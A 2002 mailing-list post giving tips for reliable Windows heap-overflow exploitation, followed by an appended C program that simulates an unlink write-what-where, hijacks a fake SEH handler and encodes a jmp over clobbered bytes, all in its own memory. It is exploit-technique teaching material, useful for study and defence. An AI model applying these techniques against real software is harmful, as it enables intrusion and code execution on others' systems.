
Windows Heap Overflows In General

From: Brett Moore <brett(at)softwarecreations.co.nz>
Date: Sun Dec 01 2002 - 21:03:04 EST


Merry Christmas all, 'tis the month for knowledge sharing.

Some tips and tricks when working with Windows heap based overflows to stimulate your mind.

*) The more the merrier - If it lets you stuff it in there, stuff it. Different sizes, different characters can give different results.
*) Running the exploit Local vs Remote can sometimes matter.
*) The only state you can be sure of, is that your request is not the first. But the only way to ensure this is by sending valid requests before the exploit. Numbers vary, find a minimum and it can help in the stability of overflows.
*) Remember with heap based overflows you can write multiple sets of 4 bytes. It's not the registers you are overflowing, but a structure. What do the other structure bytes control? Size does matter! http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0105.html
*) Where's our code at? It's not just esp that holds important variable locations. Where do all those other numbers point?

The first 3 allow you to write code that 99-100% of the time hits the spot. The last two allow you to write any relative jump instruction you need and set the SEH handler to your relative jump, thus 99-100% giving execution to your shellcode.

Heyas to all who know.

Received on Mon Dec 2 03:10:01 2002
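The last two tips above ("multiple sets of 4 bytes" written through an overflowed structure, and a relative jump installed as the SEH handler) can be walked through in code. The following is an added example, not part of Brett Moore's message: it models a free-list entry (Flink/Blink) at the start of a free chunk and the two pointer-sized writes an unchecked unlink performs when that chunk is removed from its list, then shows why the code the handler is pointed at has to start with a short jmp that hops over the bytes the second write clobbers. The `LIST_ENTRY` and `SEH_RECORD` structs, the `landing` buffer and `fake_seh` record are simplified stand-ins defined here for illustration, not the real Windows heap or exception-frame layouts, and every "write" lands in the program's own memory so it compiles and runs anywhere with a C11 compiler. Heaps that later added safe-unlinking checks reject corrupted Flink/Blink pairs, so this models the pre-check behaviour the post is describing.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define CHUNK_A 32   /* size of the overflowed allocation in the toy heap */

/* Toy free-list entry: the two links at the start of a free chunk.  Simplified
 * stand-in for illustration, not the real Windows heap layout. */
typedef struct {
    uintptr_t Flink;
    uintptr_t Blink;
} LIST_ENTRY;

/* Unchecked unlink: two pointer-sized writes through addresses read from the
 * chunk itself.  With attacker-controlled Flink/Blink this is write-what-where:
 *   write 1: *Blink = Flink             (Blink->Flink = Flink)
 *   write 2: *(Flink + ptrsize) = Blink (Flink->Blink = Blink) */
static void unlink_entry(const LIST_ENTRY *e)
{
    *(uintptr_t *)e->Blink = e->Flink;
    *(uintptr_t *)(e->Flink + sizeof(uintptr_t)) = e->Blink;
}

/* Simplified exception registration record (hypothetical name): Next, Handler. */
typedef struct {
    uintptr_t next;
    uintptr_t handler;
} SEH_RECORD;

/* Encode an x86 relative jmp whose first byte sits at `from`, landing at `to`.
 * Short form EB rel8 when the displacement fits, else near form E9 rel32.
 * The displacement is measured from the end of the jmp instruction.
 * Returns the number of bytes written to out (2 or 5). */
size_t encode_rel_jump(uintptr_t from, uintptr_t to, unsigned char out[5])
{
    intptr_t rel8 = (intptr_t)(to - (from + 2));
    if (rel8 >= -128 && rel8 <= 127) {
        out[0] = 0xEB;
        out[1] = (unsigned char)rel8;
        return 2;
    }
    int32_t rel32 = (int32_t)(to - (from + 5));   /* assumes target within +/-2 GiB */
    out[0] = 0xE9;
    memcpy(out + 1, &rel32, sizeof rel32);
    return 5;
}

static SEH_RECORD fake_seh;                    /* stand-in for the SEH frame we hijack */
static _Alignas(16) unsigned char landing[32]; /* where the attacker's code lives */

/* Runs the whole sequence: overflow chunk A into free chunk B's links with
 * Flink = landing, Blink = &fake_seh.handler.  Unlink then installs `landing`
 * as the handler (write 1) but also stores Blink at landing + ptrsize (write 2),
 * so the jmp placed at landing[0] must skip those bytes.
 * Returns 1 when the end state is exactly that, 0 otherwise. */
int demo_unlink_write(void)
{
    _Alignas(16) unsigned char heap[64];
    LIST_ENTRY *victim = (LIST_ENTRY *)(heap + CHUNK_A);   /* free chunk B's links */
    victim->Flink = (uintptr_t)victim;   /* harmless self-links before the overflow */
    victim->Blink = (uintptr_t)victim;
    fake_seh.handler = 0;
    memset(landing, 0xCC, sizeof landing);

    /* Step 1: short jmp at landing[0] that hops over the bytes write 2 will clobber. */
    uintptr_t base = (uintptr_t)landing;
    size_t jmp_len = encode_rel_jump(base, base + 2 * sizeof(uintptr_t), landing);

    /* Step 2: constructed overflow payload: filler, then the new Flink and Blink. */
    unsigned char payload[CHUNK_A + 2 * sizeof(uintptr_t)];
    uintptr_t flink = base;                       /* "what" for write 1, "where" for write 2 */
    uintptr_t blink = (uintptr_t)&fake_seh.handler; /* "where" for write 1, "what" for write 2 */
    memset(payload, 'A', CHUNK_A);
    memcpy(payload + CHUNK_A, &flink, sizeof flink);
    memcpy(payload + CHUNK_A + sizeof flink, &blink, sizeof blink);

    /* Step 3: the vulnerable copy runs past chunk A into chunk B's links. */
    memcpy(heap, payload, sizeof payload);

    /* Step 4: the heap unlinks B (free/coalesce): two attacker-steered writes. */
    unlink_entry(victim);

    int handler_hijacked = fake_seh.handler == base;
    int clobbered = memcmp(landing + sizeof(uintptr_t), &blink, sizeof blink) == 0;
    int jmp_intact = jmp_len == 2 && landing[0] == 0xEB
                     && landing[1] == (unsigned char)(2 * sizeof(uintptr_t) - 2);
    return handler_hijacked && clobbered && jmp_intact;
}

int main(void)
{
    printf("unlink write-what-where + jmp over clobber: %s\n",
           demo_unlink_write() ? "as expected" : "unexpected");
    return 0;
}
```

The point to take from `demo_unlink_write` is the second write: pointing the handler at your code is only half the job, because unlink also writes Blink into the bytes just past the start of that code, which is why the post says to set the handler to a relative jump rather than straight to the shellcode. `encode_rel_jump` gives the exact bytes for either direction and either form, so the hop can be computed from the addresses you actually have rather than hand-assembled.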


